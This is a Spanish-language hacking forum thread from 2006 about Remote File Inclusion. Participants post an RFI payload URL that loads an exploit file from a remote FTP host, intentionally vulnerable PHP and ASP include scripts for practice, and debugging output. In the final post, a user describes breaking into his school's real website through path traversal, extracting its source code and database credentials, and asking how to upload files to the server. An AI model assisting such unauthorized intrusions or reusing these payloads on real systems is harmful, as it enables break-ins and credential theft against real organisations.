Manual de RFI (Remote File Inclusion)

izengabe · 6 Noviembre 2006, 16:25 PM

Ok,es buena la alternativa,no la he probado,pero supongo que funcionará.Pero aún así quiero saber la razón por la que a mí no me funciona de la forma original...Si no,no podré dormir...

rakax · 8 Noviembre 2006, 06:09 AM

Si no me equivoco el exploit deberia de ir en otro formato k no sea .php por k se ejecutaria en tu servidor no en el de la victima,asi k seria correcto

Código [Seleccionar]

www.pagina.com/ver.php?pagina=ftp://usuario:password@servidor.ftp.com/mixploit.gif

Citar

Azielito · 8 Noviembre 2006, 16:58 PM

y ahora un script en php vulnerable xD

Código [Seleccionar]

<?php
$archivo = $_GET['secc'];
include($archivo);
?>

Y en ASP

Código [Seleccionar]

<%
Dim a
a = Request.QueryString("a")
if a <> "" Then
 Server.Execute(a)
Else
Response.Redirect("index.htm")
End If
%>

supongo que los dos se entienden, con esto pueden poner en practica esta vulnerabilidad en http://localhost

rakax · 8 Noviembre 2006, 21:32 PM

Buenas gracias por el dato pero....
me instale el php y todo y cuando lo corro en localhost lo k me sale es esto

Código [Seleccionar]

Notice: Undefined index: secc in c:\program files\easyphp1-8\www\file.php on line 2

Warning: main(): Failed opening '' for inclusion (include_path='.;C:/Program Files/EasyPHP1-8\php\pear\') in c:\program files\easyphp1-8\www\file.php on line 3

Me prece k es k tengo k definir el archivo k se va a abrir con el inclusion pero no entiendo bien.
si es asi como lo hago? (no se php,desgraciadamente)

izengabe · 9 Noviembre 2006, 00:59 AM

Hyde,si no te importa,a ver si puedes echarme un cable con lo que he comentado antes:que no me funciona pasar parámetros por get cuando la extensión del archivo no es php...

Hyde · 9 Noviembre 2006, 01:42 AM

No se si entendi bien tu pregunta. Te refieres que al intentar obtener algo no te da

Para pasar el get debe de estar en php, mandame un privado para pasarte algo que quiza te sirva pero no lo voy a colocar aqui porque es de otra web.

Intenta con demas vulnerabilidades, yo solo puse un ejemplo pero existen muchas maneras mas.

Salu2

Hyde

uniqdom · 14 Noviembre 2006, 21:00 PM

hola.. bueno el manual...
hace poco en la pagina de mi colegio me tope con una pagina en la cual podia descargar archivos (guias, pruebas, etc...)

se me ocurrio que si modificaba los datos que se enviaban en la url podria obtener el codigo fuente de la pagina.

por ejemplo cambie de http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=fisica/guias&Archivo=cinematica.doc
http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=&Archivo=DescargarArchivo.php
y eso fue lo que paso. obtube las fuentes. me pase un rato descargando otras paginas.php hasta que me tope con el user y pass de la base de datos... ahi me surgio otra pregunta, pero es parte de otro tema...

aun no se como poder subir archivos a el servidor.
intente:
http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=&Archivo=http://www.google.com
y no me salio nada en pantalla. como estaba diseñado para descargar arhcivos pense que el archivo que me mandaba para bajar saldria el codigo html de google... pero no...

les dejo lo que venia en el codigo fuentede la pagina DescargarArchivo.php :

Código [Seleccionar]


<?
$Archivo=$HTTP_GET_VARS["Archivo"]; 
$Carpeta=$HTTP_GET_VARS["Carpeta"]; 
$enlace = '/home/web/interactivo.maristas.cl/'.$Carpeta.'/'.$Archivo; 
header ("Content-Disposition: attachment; filename=".$Archivo."\n\n"); 
header ("Content-Type: application/octet-stream"); 
header ("Content-Length: ".filesize($enlace)); 
readfile($enlace); 
?>

asumo que el readfile($enlace); es con el que topo. porque supongo que intenta leer el archivo desde el servidor y no fuera.
alguien sabe que podria hacer??
igual voy a seguir buscando...